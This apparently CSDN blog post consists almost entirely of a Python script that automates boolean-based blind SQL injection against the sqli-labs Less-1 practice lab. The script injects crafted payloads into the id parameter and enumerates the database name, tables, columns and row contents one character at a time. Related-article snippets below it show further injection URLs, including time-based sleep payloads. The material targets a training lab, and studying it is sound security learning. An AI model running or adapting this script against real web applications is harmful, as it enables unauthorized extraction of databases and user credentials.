Less-1 python

最新推荐文章于 2024-10-14 14:50:26 发布
最新推荐文章于 2024-10-14 14:50:26 发布
阅读量174 收藏
点赞数
文章标签: mysql python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/up_upup/article/details/111560358
版权 
import http.client
import re
#网页的连接、GET请求、以及判断页面是否报错。
def sql_inject(url):
    # print(url)
    con=http.client.HTTPConnection('192.168.100.200:8004')
    con.request('GET',url)
    # time.sleep(1)
    html=resp=con.getresponse().read().decode()
    # print(html)
    li=re.findall(">Your Login name:(.*?)<br>Your Password:Dumb</font>",html)
    # print(li)
    if len(li)!=0:
        # print(li)
        if li[0]=="Dumb":
            return True
        else:
            return False

#获取数据长度(数据库长度、表长度、列名的长度,没有判断为空的情况)
def  get_length(url,sql):
    length = 1
    while True:
        url1 =url+f"1%27and%20length%20(({sql}))=%27{length}%27%20%20--+"
        # print(url1)
        b=sql_inject(url1)
        if b:
            return length
        else:
            length+=1

#获取数据库名字
def get_dbname(url):
    dbname=""
    template="abcdefghijklmnopqsrtuvwxyz"
    length=get_length(url,"database()")
    # print(length)
    for i in range(1,length+1):
        for j in template:
            url1 =url+f"1%27and%20substr(database(),{i},1)='{j}'%20%20%20--+"
            b=sql_inject(url1)
            if b:
                dbname+=j
                break

    return dbname
    
#获取表名
def get_table_name(url,dbname):
    tablename=''
    template = ",abcdefghijklmnopqsrtuvwxyz"
    sql =f"SELECT%20GROUP_CONCAT(TABLE_NAME)%20FROM%20information_schema.TABLES%20WHERE%20TABLE_SCHEMA=%27{dbname}%27"
    length=get_length(url,sql)
    # print(length)
    for i in range(1,length+1):
        for j in template:
            url1 = url + f"1%27+and+substr(({sql}),{i},1)=%27{j}%27--+"
            b=sql_inject(url1)
            if b:
                tablename+=j
                break

    return tablename
#获取列名
def get_column_name(url,dbname,tablename):
    column=''
    template = ",_abcdefghijklmnopqsrtuvwxyz"
    sql = f"SELECT%20GROUP_CONCAT(COLUMN_NAME)%20FROM%20information_schema.COLUMNS%20WHERE%20TABLE_SCHEMA%20=%27{dbname}%27and%20TABLE_NAME=%27{tablename}%27"
    length=get_length(url,sql)
    # print(length)
    for i in range(1,length+1):
        for j in template:
            url1 = url + f"1%27+and+substr(({sql}),{i},1)=%27{j}%27--+"
            # print(url1)
            b=sql_inject(url1)
            if b:
                column+=j
                break

    return column

#使用ascii码查找内容、形参dbname并没有用到
def content_all(url,tablename,column,dbname):
    content=''
    # print(url,tablename,column)
    sql = f"SELECT%20GROUP_CONCAT({column})%20FROM%20{tablename}"
    # print(sql)
    length=get_length2(url,sql)
    if length==0:
        return content
    else:
        for i in range(1,length+1):
            # print(length)
            for j in range(0,121):
                url1 = url + f"1%27+and+ascii(substr(({sql}),{i},1))=%27{j}%27--+"
                # print(url1)
                b=sql_inject(url1)
                if b:
                    content+=chr(j)
                    # print(content)
                    break

        return content

#查找内容长度,判断是否为空
def  get_length2(url,sql):
    length = 0
    while True:
        url2 = url + f"1%27and%20(({sql}))%20IS%20NULL%20--+"
        # print(url2)
        b = sql_inject(url2)
        if b:
            return '列表内容为空'
        url1 =url+f"1%27and%20length%20(({sql}))=%27{length}%27%20%20--+"
        # print(url1)
        b=sql_inject(url1)
        if b:
            return length
        else:
            length+=1
if __name__ == '__main__':
    # cookie, token = get_homepage('/Less-1/')
    url="/Less-1/?id="
    dbname=get_dbname(url,)
    print('库名:',dbname)
    f=get_table_name(url,dbname,)
    # print(f)
    s=f.split(',')
    print('表名:',s)
    for i in range(len(s)):
        a=s[i]
        c=get_column_name(url,dbname,s[i])
        print(f'表{s[i]}中列名有',c,sep=':')
        co=c.split(',')
        for i in range(0,len(co)):
            print(co[i])
            f=co[i]
            content=content_all(url,a,f,dbname)
            print(content)
up_upup
关注
3dmax批量导入obj_LESS Python SDK实现批量化三维辐射传输模拟
weixin_35723886的博客
12-13 741
三维辐射传输模型往往有复杂的输入参数,因此一般的模型都有相应的GUI软件,虽然GUI方便学习和使用,但是难以进行批处理以及嵌入其他程序中。在LESS中,已经提供了一个基于GUI的批处理工具,目前可以对场景中的观测参数、太阳参数以及光谱参数等进行批量修改和模拟,但是仍然无法批量地修改场景中的三维元素,例如树的结构或者树的位置,而批量修改三维结构在一些应用中也是非常常见的需求。...
sqli-labs Less-1、Less-9\Less-15 python脚本
ChamZhiZe的博客
12-21 1259
虽然这个很简单,但是还是写个脚本跑一下 Less-1 from http.client import PROCESSING, responses from re import I, T from typing import FrozenSet from bs4.dammit import xml_encoding from bs4.element import ProcessingInstruction import requests import urllib.request from colorama
Less-1
weixin_30500105的博客
04-02 80
这是第一篇,讲的东西可能比较基础,下一篇就直接说方法了。 我们先来加一个单引号看一看效果,为了方便看出结果,我把查询语句打印出来了 结合上下我们可以发现多了个单引号,我们怎么才可以把多余的单引号去掉呢? 在我所知里,有一下几种方法: 一、使用注释的方法: 在mysql数据库中,注释一般有单行注释和多行注释,而多行注释在实际中,基本上无法利用,所以只剩下了#和--,在实际操作中#号一般...
less运行环境与安装使用(一)
Cindy
11-01 2554
客户端用法  1、在页面中加入 .less 样式表的链接,并将 rel 属性设置为 "stylesheet/less": link rel="stylesheet/less" type="text/css" href="styles.less" /> 2、需要设置参数,在 <script src="less.js"> 之前 定义全局的 less 对象就可以为 L
【笔记】Caffe的Python接口-官方教程-00-classification-详细说明(含代码)
nyist_yangguang的博客
01-21 557
00-classification 主要讲的是如何利用caffenet(与Alex-net稍稍不同的模型)对一张图片进行分类(基于imagenet的1000个类别) 先说说教程到底在哪(反正我是找了半天也没发现。。。) 其实并没有官方教程一说,只是在caffe/example/下有 00-classification.ipynb; 01-learning-lenet.ipynb; 02-fine-tuning.ipynb; 等等一些列 ipython notebook文件,里面就是一些example,..
less基础详解
热门推荐
h907310116的博客
11-25 2万+
1.初识less less作为一门CSS扩展语言,也就是说CSS预处理器。(Leaner Style Sheets)简称less,它只不过是为css新增这些的功能,比如说:变量、函数、作用域等等。它的优点是:更具有维护性、扩展性等,可以降低了维护的成本,根据按这样的话,那么less可以让我们写更少的代码做更多的事情。 和css相比下,css的语法非常简单,而且对开发者来说要求比较低,比较合适小白者,但是遇到有些问题,比如没有这种变量、函数等等,的确还不如less的扩展性,需要写大量的代...
lesscss-python 是 Less CSS 的 Python 版本.rar
06-21
什么是LESSCSS LESSCSS是一种动态样式语言,属于CSS预处理语言的一种,它使用类似CSS的语法,为CSS的赋予了动态语言的特性,如变量、继承、运算、函数等,更方便CSS的编写和维护。 LESSCSS可以在多种语言、环境中...
Python面试题大全SQLi第八关,Sqli-labs Less-8,Python知识总结
m0_60144796的博客
04-05 360
Python崛起并且风靡,因为优点多、应用领域广、被大牛们认可。学习 Python 门槛很低,但它的晋级路线很多,通过它你能进入机器学习、数据挖掘、大数据,CS等更加高级的领域。Python可以做网络应用,可以做科学计算,数据分析,可以做网络爬虫,可以做机器学习、自然语言处理、可以写游戏、可以做桌面应用…Python可以做的很多,你需要学好基础,再选择明确的方向。这里给大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
最详细的讲解 让你最快通关Less-9-Less-10/ --时间盲注http://127.0.0.1/sqli-labs-master/Less-10/ --时间盲注
m0_58883317的博客
04-17 5525
http://127.0.0.1/sqli-labs-master/Less-10/ --时间盲注 判断注入点 http://127.0.0.1/sqli-labs-master/Less-10/?id=1 and 1=1 and sleep(5) http://127.0.0.1/sqli-labs-master/Less-10/?id=1 and 1=1 and sleep(5) 根据页面显示我们可以知道使用联合注入是不可行的。页面无论对错都只显示you are in所以我们选择和less-9一样
python serverless_20行代码:Serverless架构下用Python轻松搞定图像分类/预测
weixin_39978282的博客
12-11 172
前言图像分类是人工智能领域的一个热门话题。通俗解释就是,根据各自在图像信息中所反映的不同特征,把不同类别的目标区分开来的图像处理方法。它利用计算机对图像进行定量分析,把图像或图像中的每个像元或区域划归为若干个类别中的某一种,以代替人的视觉判读。图像分类在实际生产生活中也是经常遇到的,而且针对不同领域或者需求有着很强的针对性。例如通过拍照花朵识别花朵信息,通过人脸匹对人物信息等。通常情况下,这些以来...
Python 入门神书推荐 —— 500 lines or less
夜下林空
12-24 2万+
这是一本还没有出版的python入门神书,分成十几个章节,每个章节都是由一位开源大牛自己编写。目前网络上已经提供了review版本。链接如下: http://aosabook.org/blog/     这本书的内容就跟标题一样,每一章实现一个非常实用的功能,而且只用了500行或者更少的代码。全书简介如下: 1. A Template Engine (http://a
SQL注入——Less-1
一凡凡凡人的博客
09-14 1939
                 声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险!!!   打开主页进入第一关,提示输入参数id及它的值, 传入参数id=1后,我们会发现这个页面会根据传入的id查询到对应的用户及用户密码 我们可以通过查看数据库进行验证 这样我们就可以推断出PHP执行的SQL语句的功能是从数据库中查询出的信息为我们传入的id为1的...
Python中使用函数式编程:用一行搞定所有内容
wulishinian的博客
05-12 1942
在本文中,您将了解什么是函数范型,以及如何在Python中使用函数式编程。 在Python中,函数式编程中的map和filter可以做与列表相同的事情。这打破了Python的禅宗规则之一,因此函数式编程的这些部分不被认为是“Python式的”。 但是由于函数式编程高阶编程的必经之路,所以我们需要了解甚至熟练掌握。 命令范式和函数范式 我们先对比一下编程中的命令范式两个概念: 在命令式范式中,您通过给计算机一个任务序列来完成任务,然后它执行这些任务。在执行它们时,它可以改变状态。 例如,假设你一开始把A设为5
sqli-labs—————Less-1(字符型注入)
Fly_鹏程万里
05-08 1965
前言从这一篇文章开始,我们将开始真正的讲解Sqli-libs中的各种注入,从第1阶层开始,后续的内容会陆续放出,欢迎各位大佬的关注与评论!Less-1首先,打开主页进入第一关:可以看到提示,提示我们要传入一个参数,名为ID,而且是数据类型,那么我就传入该参数看看到这里,我们可以发现后台执行的SQL语句好像是根据该传入的参数id进行了相应的查询,那么我可以从搭建的环境中来看看它的数据库到底有什么东西...
使用Python编译less格式的css代码
糯米糊糊的专栏
10-27 2587
less类似于sass格式的css代码 用python编译less,得到css代码, 工具有以下几个: le's's
Less基础语法学习
zjw_python的博客
01-13 976
Less(Leaner Style Sheet)是一门向后兼容的CSS扩展语言 1 变量 less可以定义变量,在编译时自动将变量名替换为用户定义的值。使用@定义和使用变量,变量声明可以在开头,也可以在使用变量后,不一定需要预先声明: // 变量 @link-color: #428bca; //sea blue // 用法 .link { color: @link-color; } .l...
mysql 不支持utf8mb4_0900_ai_ci
最新发布
green hand的博客
10-14 278
表示它支持最多4个字节的字符,这使得它能够存储比传统 UTF-8 更多的字符。它是 MySQL 5.5.3 及以后版本推荐的字符集,因为它提供了更好的国际化支持和更广泛的字符支持。这种排序规则特别适合需要对包含字母和数字的字符串进行排序的场景,并且不区分大小写。utf8mb4_0900_ai_ci/utf8mb4_0900_ci 修改为utf8_general_ci。:这是一种超集(superset)的 UTF-8 编码,它支持存储任何Unicode字符,包括一些新的和罕见的字符。
MySQL中表的约束
pouop的博客
10-13 990
表中一定要有各种约束,通过约束,让我们来插入数据库中的数据是符合预期的。约束本质是通过技术手段,倒逼程序员插入正确的数据;反过来,站在MySQL的角度来单,内部已经插进来的数据,都i是符合数据约束的数据。约束的最终目标:保证数据完整性和可预期性为了完成以上的所有目标,就需要除了数据类型自带的范围约束以外的更多约束。
lesscpy-0.10.1:适用于Python的LESS编译器库
1. Python库:Python库是一组预编译的Python代码模块,提供了特定的功能,可以被Python程序直接调用。它们通常用于简化开发工作,避免从头开始编写重复的代码。 2. lesscpy库:lesscpy是一个Python库,主要用于处理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值